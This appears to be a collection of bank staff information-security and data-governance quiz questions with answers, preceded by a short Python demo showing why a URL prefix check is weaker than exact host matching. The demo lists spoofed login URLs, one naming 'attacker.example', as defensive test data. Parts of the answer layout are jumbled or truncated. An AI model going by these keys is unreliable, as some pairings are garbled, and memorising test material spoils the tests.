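# Added example (not from the quiz): why "the address starts with
# https://www.onlinesbi.com" is a weaker check than "the host IS the bank".
# The allow-list and the sample URLs are constructed for the demo.
from urllib.parse import urlsplit

# Hosts the example treats as the bank's own (assumption for the demo).
BANK_HOSTS = {"www.onlinesbi.com", "onlinesbi.com"}


def prefix_check(url: str) -> bool:
    """The rule as a user applies it by eye: does the text start right?"""
    return url.startswith("https://www.onlinesbi.com")


def host_check(url: str) -> bool:
    """Parse the URL and require TLS plus an exact match on the host name."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return host in BANK_HOSTS


# Constructed URLs; only the first is the bank's real address.
SAMPLES = {
    "https://www.onlinesbi.com/": "genuine",
    "https://www.onlinesbi.com.secure-login.example/": "bank name as a subdomain of another domain",
    "https://www.onlinesbi.com@attacker.example/": "bank name placed in the user-info part",
    "http://www.onlinesbi.com/": "no TLS, no padlock",
    "https://www.onlinesbi.co/": "typo-squat",
}


def classify(url: str) -> tuple[bool, bool]:
    """(what the prefix rule says, what the host rule says)."""
    return prefix_check(url), host_check(url)


if __name__ == "__main__":
    for url, note in SAMPLES.items():
        prefix_ok, host_ok = classify(url)
        print(f"{url:52} prefix={prefix_ok!s:5} host={host_ok!s:5}  {note}")
```

The second and third samples pass the prefix rule and would show a padlock if the attacker bought a certificate for their own domain, which is routine. What a user should read is the registrable domain immediately before the first `/` (ignoring anything before an `@`), and what a bank's own code should do is what `host_check` does: parse, then compare the host against an allow-list.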

Q: Which one of the following is a precaution to be taken while operating the ATM?
A: Check if any extra suspicious device is attached to the ATM machine

Q: Which one of the following is a unique feature of APT attacks?
A: An unauthorized attacker code enters a system and remains there for an extended period of time

Q: Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was considered then as a significant action on the Dark web market?
A: Silk Road 2.0

Q: Which one of the following risks is not considered while evaluating a third party vendor for risk assessment?
A: Market Risk

Q: Which one of the following statements is FALSE about APT attacks?
A: A type of cyberattack where an unauthorized attacker code enters a system and remains there.

Q: Which one of the following statements is false?
A: The user's response to bulk SMS can compromise their identities.

Q: Which one of the following statements is more appropriate in terms of Vendor risk assessment?
A: Continuous assessment of Vendor security practices needs to be done throughout the Contract life cycle.

Q: With the enhanced sharing of information over a global network for almost all life functions, which one of the following has become the latest addition to the essential objectives of Information Security after the CIA Triad?
A: Non-repudiation

Q: Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and the Bank is closed. What immediate steps would you NOT advise him?
A: Contact the Branch on Monday to deactivate INB facility
MODULE 4
QUESTIONS ANSWER
“Ransomware” can be spread through_____________? Option 1 and 2
After how many days of customer complaint, shadow reversal given to customer account in On 8th working day from date of customer
our Bank? complaint
As part of IS awareness and commemoration of Computer Security Day, SBI did NOT
Cold calling all the employees
organize which one of the following activities?
As part of IS awareness, SBI observes Computer Security Day on which of the following
30th November
day?
Creating IS awareness is important at all levels in the Bank. But the initiation should start
Branch staff
from _______________.
Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account. He
reported the incident on the same day to the bank. The bank is not able to establish
customer negligence even after completion of 90 days from the date of complaint. As per Rs.72,000/-
Limiting Liability of customer guidelines, how much amount does the Bank needs to pay to
the customer in this situation?
The free WiFi could be a rouge network,
Identify some of the risks involved in using public free WiFi.
harvesting the internet user’s data.
If a Bank always allow some of the employees to bring their own laptops, smart phones,
Bring Your Own Device
tablets etc. to office for office work. This policy is called BYOD. What does BYOD stand for?
If a customer reports an unauthorised transaction of Rs.6000/- (ATM) on the 5th working
day. It is a case of third party negligence. As per Limiting Liability of customer, what will be Nil
the liability of customer in this case?
If ATM Skimming happens at an ATM, who can report to IT Team? Anyone
If you have a Facebook account and you came to know about a breach in the Facebook Change the password of Facebook and all
server, what will be your action? the services/apps offered by Facebook.
Impact of Cyber risks are_________________. All of the above
Many websites use CAPTCHA to avoid password guessing by automated tools called
Dictionary Attack
____________.
Passwords must be created using small &
Pick the odd one. upper case, when own name or short form of
own name and own initials are used.
Anti-virus is crucial for safety of data. While
Select the correct statement about Desktop / Laptops /Workstations Usage? leaving the room user is supposed to put the
laptop for scanning.
The motive for this Ransomware attack is
Select the correct statement in this case always monetary
Unauthorized personnel can access and
Select the wrong statement about Desktop / Laptops /Workstations Usage?
exploit your system
Create a shortcut of a document/file instead
Select the wrong statement about Desktop / Laptops /Workstations Usage?
of copying it on the desktop
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank? All are true
Select the wrong statement from the below statements.(i) Lock your phone with mPIN or
password OR biometric when not in use. Always keep your mobile device in a safe
location.(ii) Download the Mobile Banking application only from the Bank’s site –
www.sbi.co.in. For using Mobile Banking service over insecure Wi-Fi, never click on any
links. Always type the URL http://mobile.prepaidsbi.com/sbiwap/ in your mobile browser(iii) All are correct
Check your linked accounts on a regular basis. Once your transaction is over, logout of the
mobile banking website and then close the browser. (iv) Delete any SMS from the Bank
that might contain your personal information like user Id, mPIN received at the time of
registration, or details sent to you. Do not part with your ATM card and PIN as this may be
misused for Mobile banking registration.
Password need not be necessarily be
Select the wrong statement.
complex but easy to remember.
You can restrict the use of ATM card details
Select the wrong statement. for online transactions in Corporate Internet
banking
For web security, verify full URL by clicking
Select the wrong statement. the link, but do not give any
personal/confidential information
It is not necessary to inform your
Select the wrong statement. organization always, if you come across any
discrepancies.
For online meetings, share a link to a
Select the wrong statement. meeting on an unrestricted publicly available
social media post, only with password

The company asked their employees to use their own devices and internet access while
working from home. List some precautions that they could have exercised even under
these conditions: (i) Ensuring that authorized antivirus is installed in the devices of the Options (i) , (ii) and (iii) are necessary
employees (ii) Ensuring that appropriate software patches are updated in the devices of
the employees (iii) Asking the employees to use enterprise VPN
WannaCry was ____________ attack. Ransomware
Negligence that causes the unauthorized
What are the parameters on which compensation to customer will depend for resolution of
transaction & Reporting time about
unauthorised transactions complaints?
unauthorized transaction to his/her Bank/FIs
What are the ways you can report an unauthorised transaction (ATM) without visiting the Call dedicated number 1800 1111 09 also
branch? Can raise through https://crcf.sbi.co.in
Time at which, the incident is brought to the
What is the “Time of detection of incident” for reporting the purpose of a cyber incident to
knowledge of any official of ISD, including
RBI, CERT-In & NCIIPC?
CGM & Group CISO
Reversal of loss amount to customer account
if Bank fails to establish customer negligence
What is the meaning of Shadow Reversal?
within 10 days, but it is allowed to withdraw
by customer
All cyber security incidents should be
What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities
reported within 2 to 6 hours by Incident
CERT-In & NCIIPC? Who should report the incident?
Response & Management Team
What should be the minimum and maximum length of the login password in Retail Internet Minimum length should be 8 characters and
Banking? maximum length 20 characters
Option to change login password is in the
Where is the option to change the Login password in Retail Internet Banking?
Profile section, post login
Phishing / Vishing attacks on customers
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC? resulting cumulative loss for the customer(s)
exceeding ₹ 50 lakh
Confidential or secret information with a
Which of the following is NOT inappropriate content of email? password protection when transmitted over
email.
Which of the following is NOT one of the best practices to maintain your password? Only difficult dictionary words should be used
Use of other officers' user ids or using a false
Which of the following options is an example of inappropriate use of the e-mail service?
identity.
Which of the following options is crucial in any UPI fraud related to Collect request? option a & b
You can use unsecure or open Wi-Fi for
Which of the following options is NOT a good wi-fi security practice?
official purposes in case of emergency
The User is responsible for any e-mail that is
Which of the following options is not a violation of acceptable usage policy?
transmitted using the e-mail
The Profile password should be a
Which of the following statements is correct regarding creation of Profile password using
combination of alphabets (in the language
the Multilingual Image based Virtual keyboard?
chosen), and numerals and images
Which of the following statements is not true about Acceptable usage policy (IS Policy) of Employee’s mobile devices need not have
our Bank? Antivirus software
Ensuring the physical access to the systems
Which of the following steps would not be a part of the planning for Work from home?
room is restricted and monitored
Which of the following will not be considered as cyber incidents for reporting to RBI? All the options will not be considered
A training awareness program that would
Which one of the following is the most important aspect for an organization as big and
provide education and guidance on a range
global as SBI to protect itself from cyber security attacks and subsequent loss of brand
of information security topics to all the
image?
internal users of its systems and applications.
However, Mobile and laptop given to the staff
Which one of the following options does not substantiate the Acceptable Usage Policy of for personal holding have exceptions to the
our Bank? policy.
Users are responsible for all activities
Which one of the following options is not a concern for password security?
originated from their User credentials
Which one of the following options is not a violation of acceptable usage policy? Receiving mails from his batchmate
Which one of the following options is not doable as per user acceptance policy?
The updates in the operating systems (say
Android, iOS etc.) and installed applications
might compromise the security of these
Which one of the following statements is not a threat to mobile and portable devices? devices.
Anyone who knows about cyber incidents
Who can report cyber incidents to Information Security Department (ISD)? including general public
Who is primarily responsible for reporting cyber security incidents ? Deputy General Manager (AC) at LHO
With every data breach or phishing attack, cybercriminals gain access to more data. Users
Change the password
should ___________________ after knowing about such attacks.
LESSON 1

Circle Data Governance Council (C-DGC) is headed by


DGM & CFO
GM NETWORK
DGM AND CDO
CIRCLE CGM

Data Governance Policy is applicable to


All employees of the Bank
All employees at Audit departments
All employees at Data Management Office
All employees at Corporate Centre

Master Data Management Process Includes ______


Create
Read
Modify & Delete
All of the Above

Which one of the following does NOT come under People factor in Data Management practices?
Data Architects
Data Owners
Data Trainers
Data Stewards

Which activities are considered under Data Management?


Handling complete Data of Organisation
Boost up Organisation Performance
Assure Data quality
All of the above

Data Governance Policy is applicable to third parties having access to SBI network and Data.
As per Vendors agreement
FALSE
TRUE
Not declared in policy

Data Protection officer reports to …..


CGM (R&DB Ops)
GM & Chief Data Management Officer
CGM (Compliance)
Chief Vigilance Officer

Which among the following may be held accountable for quality of data?
People
Processes
Practices
Technology

Data Management with lack of easy access to information for important stakeholders may result in just _________
Data Governance Strategy
Big Data Strategy
Narrow Data Strategy
None of the Above

Apex level Data Governance Council (ADGC), is headed by


DMD COO
CHAIRMAN
CDMO
MD (R&DB)

The word “Data” shall collectively refer to the following descriptions:


Data that are stored or held in servers in SBI, Data storage devices and backup media
Data owned by the Bank which are securely stored/ managed by the third party.
Data owned by the Bank which is shared with the third party
All of the above

Inconsistent Data in Annual Income fields vis-a-vis customer profile may primarily result in ________
Incorrect AML/CFT compliance
Inefficient Cross-selling
Improper KYC
None of the Above

____ is DGO of Circle


DGM & CCO
DGM (Vigilance)
DGM & CFO
DGM & CRO

Poor Data Quality may result in ______


Inorganic Growth in Business
Increased Customer stickiness
Incorrect Regulatory Reporting
All of the Above

Capturing of incorrect / incomplete Data adversely affects:


Data Quality
Analytical Models
Both 1 & 2
Neither 1 nor 2

Prime objective of Data governance framework is to ensure-


Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
To define the roles and responsibilities for Data stakeholders, and to establish clear lines of accountability.
Effective assurance and control of Data management processes.
All of the above

What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
Monthly
Quarterly
Half yearly
Bi monthly

Data processes must also put in place ______


Analytical Processes
Co-ordination Processes
Monitoring Processes
All of the Above

Data Management Office reports to which of the DMDs


DMD & Group Compliance Officer
DMD & Chief Information Officer
DMD & Chief Risk Officer
DMD & Chief Operating Officer

Providing training to staff is one of the responsibilities of Data Privacy Officer


FALSE
TRUE

Administrative office Data Governance Council (A-DGC), is headed by


RM
DGM (B&O)
AGM/CM GB
GM NETWORK

Data processes must Include ____________


Definitions of how data will be stored
Definitions of how data will be analysed
Definitions of how data will be interpreted
All of the Above

Where does Data come from?


External Parties
Magically
Logs and devices
People, Process and Technology

Data processes must Include ____________


Definitions of how data will be reported
Definitions of how data will be accessed
Definitions of how data will be interpreted
All of the Above

Data Governance Policy is formulated by which Department:


Data Management Office
Data Protection Office
Information Security Department
Compliance Department

Who would be held responsible for not feeding into CBS all the customer details given by the customer in the AOF?
BM
1 & 2
Checker
Maker

Which of the below helps in monitoring Data Governance Activities?


Data Process
Data Quality
Note
Dashboard

Data Governance can NOT be achieved by Technology alone.


TRUE
FALSE

What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical (DGC-BU/V)?
Bi monthly
Quarterly
Half yearly
Monthly

Data Governance process includes activities as:


Establish Data Governance Organisation
Define and Enforce Data Standard and Policies
Audit, Monitor & Control of Data Governance activities
All of the above

LESSON 2

Which of the following is not a type of Data leak


Improper categorization of sensitive Data
Submission of monthly P-report to controller in hard copy
Unauthorized transfer of Data to USB devices
Loss or theft of laptops and mobile devices

Non-sensitive Information includes:


Public Information
Routine Business information
Both 1 & 2
None of the above

Capturing of incorrect interest rate in loan accounts may result in _____________.


Income leakage
Excess Income
Customer Complaints
All of the above

In _______ Processing, a small group of transactions is processed on demand


Virtual Time
System
Batch
Real Time

Which one is NOT an approved way of sharing granular Data/access Data under normal
circumstances:
E-mail
Single Sign On (SSO)
Secured File Transfer Protocol (SFTP)
Active Directory login (ADS)
Project Ganga Dashboard include divergences related to:
Key Risk Indicators (KRI) Only
Neither DQ nor KRI
Data Quality (DQ) Only
Both DQ & KRI

What are the different categories of Data Classification


SECRET, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC
SENSITIVE, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, EXTERNAL

Data quality is necessary to fulfil the needs of an organization in terms of


Operations
Planning
Decision-making
All of the above

Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
All the domestic & foreign offices
All SBI employees
All the third parties having access to SBI network and granular Data
All of the above

Business Leads from Analytics come under Customer Sensitive Granular Data
TRUE
FALSE

Some of the key Data Privacy initiatives include:


Wi-Fi encryption
Secure Cloud Data Storage system
Secured Network Access
All of the above

In an Account Opening Form, if Data has been provided by the customer in a non-mandatory field (like mobile number / email ID), what should be done while inputting it in CBS?
Leave the field in CBS blank since it is non mandatory in CBS also
Input the Data exactly as given by the customer
Input partial / any similar Data without matching exactly as it is non mandatory in nature
All of the above

Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
Deduction of Excess TDS
Non-reflection of TDS in Form 26 AS
Both 1 & 2
Neither 1 nor 2

Which Portal to be accessed for Data Loss Prevention (DLP) incidents


Data Infringement Portal
Project Ganga Dashboard
DQI Dashboard
MIS Online
“Customer PII Data” is classified as ____________ Data
SENSITIVE
INTERNAL
CONFIDENTIAL
PUBLIC

A staff can be held accountable for Data quality errors.


TRUE
FALSE

What does GDPR stand for?


General Data Priority Regulation
Gross Data Protection Regulation
General Data Privacy Regulation
General Data Protection Regulation

Which of the following is true:


Data Governance is about rules how to build the content
Data Privacy is about the rules how to protect and use the contents
Data Loss Prevention (DLP) tool helps in ensuring Data Privacy
All of the above

A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of the customer is less than 18.
OVD has to be accepted, as it is a govt. document
OVD can be accepted
if one can vote, he is not a minor. OVD should be accepted
DOB on OVD and AOF, if same, then only account may be opened

If a car dealer asks us for a list of customers having existing car loans, to market loans for
new cars for us, shall we share the list?
May be shared by the Field Officer
May be shared by the Branch Manager
Either 1 or 2
Cannot be shared

Incorrect classification of values like Gender or Customer Type comes under which one of
the following Data Quality Dimension?
Accuracy
Validity
Consistency
Completeness

“Internal audit reports” is classified as ____________ Data


SENSITIVE
PUBLIC
CONFIDENTIAL
INTERNAL

“SBI telephone directory” is classified as ____________ Data


SENSITIVE
INTERNAL
PUBLIC
CONFIDENTIAL
Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
Incorrect Interest Rate
Incorrect Risk weight
Both 1 & 2
Neither 1 nor 2

The best principles for improving Data Quality include(s)


Doing the things right at very first instance
Doing the right things every time
Either 1 or 2
Both 1 & 2 above

What are the impacts of feeding an incorrect date of birth of a customer in CBS?
Incorrect Customer profile
Customer would not be able to reset his INB password
1 & 2
No Impact

Sharing of Data with external agencies is governed by


SOP on Data Loss Prevention
SOP on Data Sharing with External agencies/third parties
SOP on Data Infringement
SOP on Customer Sensitive Granular Data Sharing

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data
Sharing and Access – Within Bank’s Environment’:
Regulated & Limited access
Restricted & Registered access
Free & Uncontrolled access
None of the above

In case of demand for customer Data by a Regulatory Authority, it may be shared as per DG Policy
FALSE
TRUE

Salient features of Project Ganga include:


Customer One view
Business Unit wise error classification
Circle-wise error classification
All of the above
LESSON 3
What is a Denial of Service Attack?
A type of attack whereby malicious commands are sent to a system/application through unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traffic
It is an attack meant to shut down a machine or network, making it inaccessible to its intended users
An attack used to monitor and potentially modify communications between two users.

Which one of the following is a precaution to be taken while operating the ATM?
Taking help from unknown persons if there is a problem with the ATM
Allowing another person to watch while entering the PIN
Handing over the card to another person who offered help to operate the ATM
Check if any extra suspicious device is attached to the ATM machine.

Which of the following is not a stage in SIM swapping?


After customer verification, the mobile operator deactivates the old SIM card in customer possession and issues a new SIM
Fraudsters obtain customer’s personal data through phishing or social engineering.
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and create a fake ID.
All the options above are stages of SIM Swapping

Select the correct statement about the impact of Cyber Risks.


The impact on the services or the potential of the attack infecting our customers’ systems.
Loss of Intellectual Property
financial cost in managing a cyber-attack
All are true

__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?


Keylogger
Scareware
Fileless
Spyware

Which of the following principles of Confidentiality, the first element of the CIA Triad, is/are correct?
a. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resources.
b. The goal of confidentiality protection is to prevent unauthorized access to the information.
c. Confidentiality focuses security measures on ensuring that none other than the sender of a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
Only a and b
a, b and c
a, c and d
a, b and d

What is not true about SIM Swapping?


SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card issued for a specific registered mo
Phishing or social engineering techniques are used to obtain personal information of the customers/users.
Fraudsters get access to the root of the mobile phone through SIM Swapping
Option b & c

With the enhanced sharing of information over a global network for almost all life functions, which one of the following has become the latest addition to the essential objectives of Information Security after the CIA Triad?
Authentication
Non-repudiation
Authorization
Non-refutation
What is not true about myths associated with Cyber Risk?
Cyber threat always starts externally
IT team is alone not responsible for Cyber Security
Compliance and security are the same
Cyber security is an issue which is related to technology

How does the use of Virtual keyboard protect the customer?


It is a useless feature
It protects against Keylogger malware
It protects against computer Viruses
It protects against computer Worms.

Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was considered then as a significant action on the Dark web market?
Silk Road 2.0
DisrupTor
Tor
Dark Market

The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, Acc
Vishing
Spoofing
Stegnography
Identity theft

The technique used to send the emails to all the employees of the Bank is known as ____________.
Smishing
Vishing
Phishing
Spear Phishing

The Cyber-attacks originate through a third party vendor are also called ________?
Service provider attacks
Supplier attacks
Supply chain attacks
Vendor attacks

What makes SolarWinds attack an unusual hack?


The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to Orion soft
The hackers targeted a government agency like Pantagon
The hackers seriously damaged the energy supply
The hackers through one malicious code in SolarWinds Orion software gained access to thousands of other companies.

Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and Bank is closed.
Change the password
Lock User access using the relevant link
Contact the Branch on Monday to deactivate INB facility
Type an incorrect login password 4 times so that the username gets locked for a day
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the ne
Audio Captcha in the login screen.
Virtual keyboard in the login screen
OTP has been made mandatory at the time of login
Image based Captcha in the login screen

Which one of the following is NOT a type of MITM attack?


DNS Spoofing
Logic Bomb
IP Spoofing
Wi-fi eavesdropping

Which of the following principles of the second of CIA Triad Integrity is/are Correct?
a.Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b.Integrity protection prevents any kind of alteration of the information.
c.Properly implemented integrity protection provides a means for authorized changes while protecting against intended a
d.Use of a secure Hashing algorithm for the information ensures Integrity.
Only a and b
a, b and c
a, c and d
a, b and d

Which of the following browsers allows access to the Network which is popular for implementing encrypted routing te
Chrome
Edge
Tor
Firefox

The fraudster gets the personal details of the people through _______technique.
Spoofing
Keylogger malware
Vishing
Social engineering

Which of the following is not the examples of data?


Employees information
Customer Information
Official conversation over phone
All are examples of data

Which one is not an option for disabling UPI services?


YONO Main Screen UPI Enable/Disable UPI
CBS App menu UPI Disable/Re-enable UPI
Contact Centre: 1800112211/18004253800
Branch Interface (Maker-Checker Concept):

Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. He
It should start with https://www.retail.onlinesbi.com
It should start with https://www.merchant.onlinesbi.sbi
It should start with https://www.onlinesbi.com
It should start with https://www.retailmerchant.sbi
If you want to change the username and password for your SBI Internet banking, which of the following statements is c
You cannot change the Username but he/she can change the password at any time
You can change the Username but not the password
You can only interchange the username by the password and vice versa
You can change both the Username and password at any time

Which one of the following statements is false?


Organizations use Bulk SMS service for marketing and communications.
Bulk SMS simply means sending a large volume or quantity of SMS
Bulk SMS is sending SMS from mobile to many people.
The user’s response to bulk SMS can compromise their identities.

A Cyber-Attack
is not limited to, stealing, altering or destroying the systems/network, disrupting operations and causing information or id
is a targeted assault on the Bank’s cyberspace and its underlying infrastructure systems
option a or b
option a & b

_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a conn
Man in the Middle attack
Bluesnarfing
Steganography
Spoofing

Which one of the following statements is FALSE about APT attacks?


A type of cyberattack where an unauthorized attacker code enters a system and remains there.
APT attacks may help the attacker in stealing information
APT attacks may be identified immediately as it shuts down the whole system
In APT attacks, attacker code may spread into other machines in the victim’s network and compromise them.

SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
Audio Captcha
Image Captcha
Online Virtual Keyboard
Biometric access

What is a Denial of Service Attack?
A type of attack whereby malicious commands are sent to a system/application through unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traffic from multiple computers at the same time
It is an attack meant to shut down a machine or network, making it inaccessible to its intended users
An attack used to monitor and potentially modify communications between two users.

Which one of the following is a precaution to be taken while operating the ATM?
Taking help from unknown persons if there is a problem with the ATM
Allow another person to watch while entering the PIN
Handing the card to another person who offered help to operate the ATM
Check if any extra suspicious device is attached to the ATM machine.

Which of the following is not a stage in SIM swapping?
After customer verification, the mobile operator deactivates the old SIM card in the customer's possession and issues a new SIM card to the fraudster. With the new SIM, fraudsters can receive authentication codes or OTPs for banking transactions.
Fraudsters obtain the customer’s personal data through phishing or social engineering.
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and create a fake ID.
All the options above are stages of SIM Swapping

Select the correct statement about the impact of Cyber Risks.
The impact on the services or the potential of the attack infecting our customers’ systems.
Loss of Intellectual Property
Financial cost in managing a cyber-attack
All are true

__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?
Keylogger
Scareware
Fileless
Spyware

Which of the following principles of the first of the CIA Triad, Confidentiality, is/are correct?
a. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resources.
b. The goal of confidentiality protection is to prevent unauthorized access to the information.
c. Confidentiality focuses security measures on ensuring that none other than the sender of a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
Only a and b
a, b and c
a, c and d
a, b and d

What is not true about SIM Swapping?
SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card issued for a specific registered mobile number.
Phishing or social engineering techniques are used to obtain personal information of the customers/users.
Fraudsters get access to the root of the mobile phone through SIM Swapping
Option b & c

With the enhanced sharing of information over a global network for almost all life functions, which one of the following has become the latest addition to the essential objectives of Information Security after the CIA Triad?
Authentication
Non-repudiation
Authorization
Non-refutation

What is not true about myths associated with Cyber Risk?
Cyber threat always starts externally
The IT team alone is not responsible for Cyber Security
Compliance and security are the same
Cyber security is an issue related to technology

How does the use of Virtual keyboard protect the customer?
It is a useless feature
It protects against Keylogger malware
It protects against computer Viruses
It protects against computer Worms.

Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was considered then as a significant action on the Dark web market?
Silk Road 2.0
DisrupTor
Tor
Dark Market

The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, Account suspension, winning lottery, SIM block, eKYC updates etc. is known as ________.
Vishing
Spoofing
Steganography
Identity theft

The technique used to send the emails to all the employees of the Bank is known as ____________.
Smishing
Vishing
Phishing
Spear Phishing

Cyber-attacks that originate through a third-party vendor are also called ________.
Service provider attacks
Supplier attacks
Supply chain attacks
Vendor attacks

What makes the SolarWinds attack an unusual hack?
The hackers, through one piece of malicious code in the SolarWinds vendor’s application, gained access to the Orion software
The hackers targeted a government agency like the Pentagon
The hackers seriously damaged the energy supply
The hackers, through one piece of malicious code in the SolarWinds Orion software, gained access to thousands of other companies.

Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and the Bank is closed. What immediate steps would you NOT advise him?
Change the password
Lock User access using the relevant link
Contact the Branch on Monday to deactivate INB facility
Type an incorrect login password 4 times so that the username gets locked for a day

Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the new security feature in OnlineSBI?
Audio Captcha in the login screen.
Virtual keyboard in the login screen
OTP has been made mandatory at the time of login
Image based Captcha in the login screen

Which one of the following is NOT a type of MITM attack?
DNS Spoofing
Logic Bomb
IP Spoofing
Wi-Fi eavesdropping

Which of the following principles of the second of the CIA Triad, Integrity, is/are correct?
a. Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b. Integrity protection prevents any kind of alteration of the information.
c. Properly implemented integrity protection provides a means for authorized changes while protecting against intended and malicious unauthorized activities (such as viruses and intrusions) as well as mistakes made by authorized users (by commission or omission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
Only a and b
a, b and c
a, c and d
a, b and d

Which of the following browsers allows access to the Network which is popular for implementing encrypted routing technology and preventing user tracking?
Chrome
Edge
Tor
Firefox

The fraudster gets the personal details of the people through the _______ technique.
Spoofing
Keylogger malware
Vishing
Social engineering

Which of the following is not an example of data?
Employees’ information
Customer Information
Official conversation over phone
All are examples of data

Which one is not an option for disabling UPI services?
YONO Main Screen UPI Enable/Disable UPI
CBS App menu UPI Disable/Re-enable UPI
Contact Centre: 1800112211/18004253800
Branch Interface (Maker-Checker Concept)

Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making the online payment. He is redirected to a site of SBI. Before he logs in, what should be the website address on the screen?
It should start with https://www.retail.onlinesbi.com
It should start with https://www.merchant.onlinesbi.sbi
It should start with https://www.onlinesbi.com
It should start with https://www.retailmerchant.sbi

If you want to change the username and password for your SBI Internet banking, which of the following statements is correct?
You cannot change the Username but you can change the password at any time
You can change the Username but not the password
You can only interchange the username by the password and vice versa
You can change both the Username and password at any time

Which one of the following statements is false?
Organizations use Bulk SMS service for marketing and communications.
Bulk SMS simply means sending a large volume or quantity of SMS
Bulk SMS is sending SMS from mobile to many people.
The user’s response to bulk SMS can compromise their identities.

A Cyber-Attack
is not limited to stealing, altering or destroying the systems/network, disrupting operations and causing information or identity theft.
is a targeted assault on the Bank’s cyberspace and its underlying infrastructure systems
Option a or b
Option a & b

_____________ is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a connection is established then the attacker will be able to steal photos, messages and contacts etc.
Man in the Middle attack
Bluesnarfing
Steganography
Spoofing

Which one of the following statements is FALSE about APT attacks?
A type of cyberattack where an unauthorized attacker code enters a system and remains there.
APT attacks may help the attacker in stealing information
APT attacks may be identified immediately as they shut down the whole system
In APT attacks, attacker code may spread into other machines in the victim’s network and compromise them.

SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
Audio Captcha
Image Captcha
Online Virtual Keyboard
Biometric access

LESSON 4

30
Select the wrong statement.
For online meetings, Manage screen sharing options. Change screen sharing to “Host Only.” Avoid file sharing
Do not play online games on company devices as they may download trojans.
Secure your Wi-Fi router connections by enabling WPA2 + AES security
For web security, verify full URL by clicking the link, but do not give any personal/confidential information

1
Which one of the following is the most important aspect for an organization as big and global as SBI to protect itself from cyber security attacks and subsequent loss of brand image?
A training program for all the vendors to underscore secure coding practices.
A training and awareness program for all the employees in the Information Security department.
An awareness program among all the customers to provide education and guidance on a range of topics, including email, cloud and mobile security.
A training awareness program that would provide education and guidance on a range of information security topics to all the internal users of its systems and applications.

2
Who is primarily responsible for reporting cyber security incidents?
Deputy General Manager (AC) at LHO
ATM Channel Manager
Branch Manager
Regional Manager (RBO)

3
Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
We need to protect the data by following acceptable usage policy guidelines of our bank.
All the workstations / devices should be protected by strong passwords.
However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.
Always lock your desktop while leaving your seat.

4
Which of the following statements is NOT correct in the WannaCry case?
A Windows vulnerability discovered by the United States National Security Agency (NSA).
After the system got affected by WannaCry, Microsoft released the patch for the system which has updated security.
The attackers’ collective was called The Lazarus Group.
This was only one month after Windows released patches for the exploit, meaning that computers that had yet to update were still left vulnerable.

5
Identify some of the risks involved in using public free Wi-Fi.
All of the above statements are correct
It can expose the users to Man-in-the-middle attacks
The free Wi-Fi could be a rogue network, harvesting the internet user’s data.
Hackers may be misusing the free Wi-Fi to distribute malware

6
Websites use CAPTCHA to avoid password guessing by automated tools, to prevent _______.
Shoulder surfing
Dictionary Attack
Brute-force Attack
Guessing

7
Which one of the following options is not a concern for password security?
In case of any breach in a Social Media Handle, delete your Social Media Account instead of changing the password.
Password is required to be sufficiently long and secret
Users are responsible for all activities originating from their User credentials
Password should be treated like a signature

8
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
All cyber incidents irrespective of amount of loss
Phishing / Vishing attacks on customers resulting in a cumulative loss for the customer(s) exceeding ₹ 50 lakh
All incidents which lead to customer service disruptions due to non-availability of IT systems
All of the above

9
If a Bank always allows some of its employees to bring their own laptops, smartphones, tablets etc. to the office for office work, this policy is called BYOD. What does BYOD stand for?
Bring Your Own Desktop
Bring Your Own Device
Buy Your Own Device
Budget Your Own Device

10
Can we create the password in another regional language (other than English and Hindi) in Retail Internet Banking?
